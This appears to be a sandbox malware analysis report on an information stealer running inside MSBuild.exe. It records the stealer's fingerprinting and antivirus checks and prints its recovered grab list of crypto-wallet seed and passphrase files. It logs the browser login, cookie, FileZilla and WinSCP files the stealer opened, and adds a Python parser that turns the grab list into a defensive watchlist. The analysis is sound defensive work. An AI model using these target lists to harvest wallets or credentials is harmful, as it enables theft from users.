Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_0042B777
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_00427706
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_0042B710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 1_2_0042B7B3
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 8_2_001CC085
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: GetLocaleInfoW, 8_2_001C622B
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: EnumSystemLocalesW, 8_2_001CC327
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: EnumSystemLocalesW, 8_2_001CC372
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: EnumSystemLocalesW, 8_2_001CC40D
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 8_2_001CC498
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: GetLocaleInfoW, 8_2_001CC6EB
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 8_2_001CC814
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: GetLocaleInfoW, 8_2_001CC91A
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 8_2_001CC9E9
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: EnumSystemLocalesW, 8_2_001C5D7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00DB7815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410C28 GetProcessHeap,HeapAlloc,GetUserNameA, 1_2_00410C28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410D03 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 1_2_00410D03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.4.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.AAFIIJDAAA.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2216121534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.T2bmenoX1o.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T2bmenoX1o.exe.dddad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T2bmenoX1o.exe.dddad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1811230468.0000000000DDD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: T2bmenoX1o.exe PID: 7284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7300, type: MEMORYSTR
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: keystore
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: Yara match File source: 00000001.00000002.2226316788.0000000000503000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7300, type: MEMORYSTR
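The wallet string recovered from MSBuild.exe memory above is a pipe-delimited grab list: each record is five fields, name, base-directory code, relative directory, file mask, recursive flag, and the "File opened" entries that follow are that list being walked. The parser below is an added example written for this report, not code from Joe Sandbox or from the malware. It reads the dump exactly as shown (the leading "*|0|" is the tail of a record cut off by the dump boundary and is skipped), resolves each record to an absolute directory, reconciles the result against the directories the sandbox actually saw opened, and answers whether a given file path would be collected. The mapping of base codes to folders is an inference from this report (code 0 lines up with AppData\Local, code 1 with AppData\Roaming); code 2 never appears among the observed opens, so mapping it to the user profile root is an assumption, as is treating the last field as a recurse-subdirectories flag. The observed-path list is constructed from the "File opened" lines above.

```python
import fnmatch
import ntpath

# Constructed: the wallet-grabber configuration exactly as it appears in the
# MSBuild.exe memory dump, split into pieces only for readability.
WALLET_CONFIG = (
    r"*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|"
    r"Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|"
    r"Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|"
    r"Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|"
    r"Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|"
    r"Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|"
    r"Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|"
    r"Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|"
    r"Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|"
    r"Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|"
    r"Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|"
    r"Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|"
    r"Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|"
    r"Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|"
    r"Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|"
)

# Assumed meaning of the base-directory code, inferred from the "File opened" lines
# in this report (0 -> AppData\Local, 1 -> AppData\Roaming). Code 2 is never observed
# here; mapping it to the profile root is an assumption.
BASE_DIRS = {
    "0": r"C:\Users\user\AppData\Local",
    "1": r"C:\Users\user\AppData\Roaming",
    "2": r"C:\Users\user",
}

# Constructed from the wallet-related "File opened" lines in this report (de-duplicated).
_R = "C:\\Users\\user\\AppData\\Roaming\\"
OBSERVED_OPENS = [_R + p for p in (
    "Bitcoin\\wallets\\", "Electrum\\wallets\\", "Electrum-LTC\\wallets\\", "Exodus\\",
    "Exodus\\exodus.wallet\\", "Exodus\\backups\\", "ElectronCash\\wallets\\", "MultiDoge\\",
    "atomic\\Local Storage\\leveldb\\", "Binance\\", "Ledger Live\\Local Storage\\leveldb\\",
    "Ledger Live\\Session Storage\\", "Ledger Live\\", "atomic_qt\\config\\", "atomic_qt\\exports\\",
    "Guarda\\IndexedDB\\https_guarda.co_0.indexeddb.leveldb\\", "Guarda\\Local Storage\\leveldb\\",
)] + ["C:\\Users\\user\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\"]


def parse_wallet_config(blob):
    """Split the dump into 5-field records: name, base code, relative dir, mask, recursive.
    The dump starts mid-record, so tokens are skipped until a plausible record start
    (a base code followed by a directory beginning with a backslash)."""
    tokens = blob.split("|")
    i = 0
    while i + 2 < len(tokens) and not (tokens[i + 1] in BASE_DIRS and tokens[i + 2].startswith("\\")):
        i += 1
    records = []
    while i + 4 < len(tokens):
        name, base, rel, mask, rec = tokens[i:i + 5]
        records.append({"name": name, "base": base, "dir": rel, "mask": mask, "recursive": rec == "1"})
        i += 5
    return records


def target_directories(records, base_dirs=BASE_DIRS):
    """Absolute directories the grabber will enumerate, de-duplicated in config order."""
    out = []
    for r in records:
        path = base_dirs[r["base"]] + r["dir"]
        if path not in out:
            out.append(path)
    return out


def reconcile(observed, records, base_dirs=BASE_DIRS):
    """Return (observed opens this config fragment does not explain,
    config targets the sandbox never opened)."""
    targets = target_directories(records, base_dirs)
    return [p for p in observed if p not in targets], [t for t in targets if t not in observed]


def would_collect(path, records, base_dirs=BASE_DIRS):
    """Names of records whose directory and mask would pick up `path`.
    Windows wildcard semantics are assumed: '*.*' matches any name and matching is
    case-insensitive; a recursive record also covers subdirectories."""
    directory, filename = ntpath.split(path)
    hits = []
    for r in records:
        target = (base_dirs[r["base"]] + r["dir"]).rstrip("\\").lower()
        mask = "*" if r["mask"] == "*.*" else r["mask"].lower()
        d = directory.lower()
        in_dir = d == target or (r["recursive"] and d.startswith(target + "\\"))
        if in_dir and fnmatch.fnmatchcase(filename.lower(), mask):
            hits.append(r["name"])
    return hits


if __name__ == "__main__":
    recs = parse_wallet_config(WALLET_CONFIG)
    for d in target_directories(recs):
        print(d)
    unexplained, unobserved = reconcile(OBSERVED_OPENS, recs)
    print("opens not covered by this config fragment:", unexplained)
    print("config targets never opened in the sandbox:", unobserved)
```

Running it against the report's own data shows two things a reader of the raw listing would otherwise have to work out by hand: the Bitcoin and Electrum opens are not covered by the recovered string, so the dump is a fragment of a longer list, and the three Chia directories (the only code-2 entries) are the only configured targets with no matching open, so the code-2 mapping cannot be confirmed from this report. The resolved directory list is directly usable as a file-access watchlist for endpoint telemetry.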

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.AAFIIJDAAA.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2216121534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.T2bmenoX1o.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T2bmenoX1o.exe.dddad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T2bmenoX1o.exe.dddad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1811230468.0000000000DDD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: T2bmenoX1o.exe PID: 7284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7300, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD40C40 sqlite3_bind_zeroblob, 1_2_6CD40C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD40D60 sqlite3_bind_parameter_name, 1_2_6CD40D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC68EA0 sqlite3_clear_bindings, 1_2_6CC68EA0